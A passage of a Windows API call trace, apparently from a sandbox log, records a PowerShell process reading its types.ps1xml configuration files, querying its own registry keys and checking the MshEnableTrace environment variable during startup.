	[0654.516] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d690 | out: lpFileInformation=0x14d690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0656.233] SetErrorMode (uMode=0x1) returned 0x1
	[0656.236] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0656.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.237] CoTaskMemFree (pv=0x1b7c98b0) 
	[0656.237] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0656.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.238] CoTaskMemFree (pv=0x1b7c98b0) 
	[0656.239] GetACP () returned 0x4e4
	[0656.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0656.251] SetErrorMode (uMode=0x1) returned 0x1
	[0656.252] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0656.253] GetFileType (hFile=0x2f8) returned 0x1
	[0656.253] SetErrorMode (uMode=0x1) returned 0x1
	[0656.254] GetFileType (hFile=0x2f8) returned 0x1
	[0656.258] ReadFile (in: hFile=0x2f8, lpBuffer=0x2c6fb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2c6fb10*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.260] ReadFile (in: hFile=0x2f8, lpBuffer=0x2c6fb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2c6fb10*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.261] ReadFile (in: hFile=0x2f8, lpBuffer=0x2c6fb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2c6fb10*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0656.261] ReadFile (in: hFile=0x2f8, lpBuffer=0x2c6fb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2c6fb10*, lpNumberOfBytesRead=0x14d5c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0656.261] ReadFile (in: hFile=0x2f8, lpBuffer=0x2c6ef6b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2c6ef6b*, lpNumberOfBytesRead=0x14d5c8*=0x0, lpOverlapped=0x0) returned 1
	[0656.261] ReadFile (in: hFile=0x2f8, lpBuffer=0x2c6fb10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2c6fb10*, lpNumberOfBytesRead=0x14d5c8*=0x0, lpOverlapped=0x0) returned 1
	[0656.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0656.264] SetErrorMode (uMode=0x1) returned 0x1
	[0656.264] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d540 | out: lpFileInformation=0x14d540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0656.264] SetErrorMode (uMode=0x1) returned 0x1
	[0656.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0656.265] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d628 | out: phkResult=0x14d628*=0x2f8) returned 0x0
	[0656.265] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d5ac, lpData=0x0, lpcbData=0x14d5a8*=0x0 | out: lpType=0x14d5ac*=0x1, lpData=0x0, lpcbData=0x14d5a8*=0x56) returned 0x0
	[0656.265] CoTaskMemAlloc (cb=0x5a) returned 0x2f9600
	[0656.265] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d57c, lpData=0x2f9600, lpcbData=0x14d578*=0x56 | out: lpType=0x14d57c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d578*=0x56) returned 0x0
	[0656.265] CoTaskMemFree (pv=0x2f9600) 
	[0656.266] RegCloseKey (hKey=0x2f8) returned 0x0
	[0656.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0656.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0657.797] VirtualQuery (in: lpAddress=0x14c310, lpBuffer=0x14d1d0, dwLength=0x30 | out: lpBuffer=0x14d1d0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0657.807] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0657.808] GetFileType (hFile=0x2f8) returned 0x1
	[0657.808] SetErrorMode (uMode=0x1) returned 0x1
	[0657.808] GetFileType (hFile=0x2f8) returned 0x1
	[0657.808] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.025] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.025] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.026] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.026] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.026] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.026] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.633] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.633] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.635] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.635] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.636] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.637] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.637] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.637] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.640] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.641] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.641] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.641] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.642] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.642] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.642] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.643] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.643] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.643] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.644] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.645] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.645] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.645] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.656] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.656] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.656] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.657] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.657] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.658] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.658] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.658] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1000, lpOverlapped=0x0) returned 1
	[0659.659] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0659.659] ReadFile (in: hFile=0x2f8, lpBuffer=0x2cd6cd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d5c8, lpOverlapped=0x0 | out: lpBuffer=0x2cd6cd0*, lpNumberOfBytesRead=0x14d5c8*=0x0, lpOverlapped=0x0) returned 1
	[0659.659] CloseHandle (hObject=0x2f8) returned 1
	[0659.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0659.659] SetErrorMode (uMode=0x1) returned 0x1
	[0659.659] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d540 | out: lpFileInformation=0x14d540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0659.659] SetErrorMode (uMode=0x1) returned 0x1
	[0659.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0659.660] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d628 | out: phkResult=0x14d628*=0x2f8) returned 0x0
	[0659.660] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d5ac, lpData=0x0, lpcbData=0x14d5a8*=0x0 | out: lpType=0x14d5ac*=0x1, lpData=0x0, lpcbData=0x14d5a8*=0x56) returned 0x0
	[0659.660] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0659.660] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d57c, lpData=0x1b7d2170, lpcbData=0x14d578*=0x56 | out: lpType=0x14d57c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d578*=0x56) returned 0x0
	[0659.660] CoTaskMemFree (pv=0x1b7d2170) 
	[0659.660] RegCloseKey (hKey=0x2f8) returned 0x0
	[0659.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0659.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0671.456] VirtualQuery (in: lpAddress=0x14c310, lpBuffer=0x14d1d0, dwLength=0x30 | out: lpBuffer=0x14d1d0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0671.463] VirtualQuery (in: lpAddress=0x14c310, lpBuffer=0x14d1d0, dwLength=0x30 | out: lpBuffer=0x14d1d0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0674.549] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0674.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0674.549] CoTaskMemFree (pv=0x1b7c98b0) 
	[0676.182] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d7c8 | out: phkResult=0x14d7c8*=0x2f4) returned 0x0
	[0676.182] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d7dc, lpData=0x0, lpcbData=0x14d7d8*=0x0 | out: lpType=0x14d7dc*=0x1, lpData=0x0, lpcbData=0x14d7d8*=0x74) returned 0x0
	[0676.182] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d74c, lpData=0x0, lpcbData=0x14d748*=0x0 | out: lpType=0x14d74c*=0x1, lpData=0x0, lpcbData=0x14d748*=0x74) returned 0x0
	[0676.182] CoTaskMemAlloc (cb=0x78) returned 0x28fdf0
	[0676.182] RegQueryValueExW (in: hKey=0x2f4, lpValueName="path", lpReserved=0x0, lpType=0x14d71c, lpData=0x28fdf0, lpcbData=0x14d718*=0x74 | out: lpType=0x14d71c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d718*=0x74) returned 0x0
	[0676.183] CoTaskMemFree (pv=0x28fdf0) 
	[0676.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0676.183] SetErrorMode (uMode=0x1) returned 0x1
	[0676.183] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d6a0 | out: lpFileInformation=0x14d6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0676.183] SetErrorMode (uMode=0x1) returned 0x1
	[0676.184] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0676.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.184] CoTaskMemFree (pv=0x1b7c98b0) 
	[0676.198] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0676.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.198] CoTaskMemFree (pv=0x1b7c98b0) 
	[0676.200] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
	[0676.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c98b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.200] CoTaskMemFree (pv=0x1b7c98b0) 
	[0676.202] CoTaskMemAlloc (cb=0x104) returned 0x1b7c98b0
